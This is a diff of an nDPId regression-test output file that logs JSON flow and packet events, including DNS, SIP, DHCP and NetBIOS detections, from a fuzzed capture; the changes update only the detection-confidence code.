-00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470899861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470899861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":200000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"thread_ts_msec":1120470899862,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1120470899862,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1120470899862,"pkt":"ADBUADRWAODtAW6\/CABFAARQa9cAAIAREwbAqAEC1PIhIxPERcQEPH6wSU5WSVRFIHNpeDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ek\/oRzRiS25wMjAyMzgyNzWqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1120470899865,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470899865,"pkt":"ADBUADRWAODtAW69CABFAABIa9gAAIARS3nAqgECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrd0YhAAE="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470899865,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1120470900860,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470900860,"pkt":"ADBUADRWAODtAW69CABFAABIa9oAAIARS3fAqAECwKgBAQr6ADUANDnU8AEBAAABAAAAAAAABF9zaXAEX3VkcQNzaXAJTXliZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.mybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470900860,"flow_last_seen":1120470900860,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470900860,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udq.sip.mybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1120470902863,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470902863,"pkt":"ADBUADRWAODtAW69CABFAABIa9sAAIARS3bAqAECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAheQE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470900860,"flow_last_seen":1120470902863,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470902863,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":584,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470900860,"flow_last_seen":1120470902863,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470902863,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1120470904866,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470904866,"pkt":"ADBUADRWAODtAW69CABFAABIa9wAAIARS3XAqAECwKgBAQr6ADUANDnJ8AEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJTnliZXJjaXR5AmRrAAAhAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470904866,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.nybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":587,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470904866,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.nybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1120470908872,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470908872,"pkt":"ADBUADRWAODtAW69CABFAABIa90AAIARS3SAqAECwKgBAQr6ADUANDnJ8AEBAIgBAAAAABAABF9zaXAEX3VkcANzaXAJY3liZXNjaXR5AmRrAAAhAAE="} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470301328,"flow_last_seen":1120470301328,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":127,"flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470908872,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1120470916873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470916873,"pkt":"ADBUADRWAODtAW69CABFAABEa94AAIARS3fAqAECwKgBAQr7ADUAMMzBWAIAAAABqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916873,"flow_last_seen":1120470916873,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470916873,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2811,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1120470916875,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470916875,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqOkBwKgBAgA1CvsAR689eAKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470916875,"flow_last_seen":1120470916875,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470916875,"l3_proto":"ip4","src_ip":"192.168.233.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2811,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470916876} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":591,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470916875,"pkt":"ADBUADRWAODtAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":592,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1120470923515} @@ -1143,26 +1143,26 @@ 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1120470924263,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470924263,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa+EAAIARSmzAqAECwKgB\/wCJA4kAOltBhVoBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVIQ0FDQUNBQ0FDQUJNAAAgAAE="} 